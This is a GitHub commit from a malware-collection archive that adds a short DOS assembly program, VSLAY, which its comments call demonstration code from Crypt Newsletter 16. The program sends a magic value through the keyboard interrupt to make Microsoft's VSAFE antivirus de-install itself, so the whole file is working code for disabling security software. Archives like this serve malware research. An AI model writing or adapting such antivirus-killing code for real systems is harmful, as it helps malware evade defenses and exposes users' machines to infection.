Add files via upload

This commit is contained in:
vxunderground
2021-01-12 18:07:35 -06:00
committed by GitHub
parent 6bf46a48b9
commit c227f1121a
97 changed files with 38998 additions and 0 deletions
+19
View File
@@ -0,0 +1,19 @@
;VSLAY - simple de-install Microsoft Antivirus VSAFE
;demonstration code for Crypt Newsletter 16
code segment
assume cs:code, ds:code, es:code, ss:nothing
org 100h
begin: call vslay
vslay:
mov ax,64001 ;wakes up VSAFE to keyboard input
mov dx,5945h ;asks VSAFE to de-install
int 16h ;calls VSAFE-hooked interrupt: keyboard
ret ;exit
code ends
end begin